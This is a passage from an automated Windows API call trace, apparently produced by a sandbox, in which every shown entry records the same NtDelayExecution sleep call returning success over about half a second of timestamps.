(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.308] NtDelayExecution 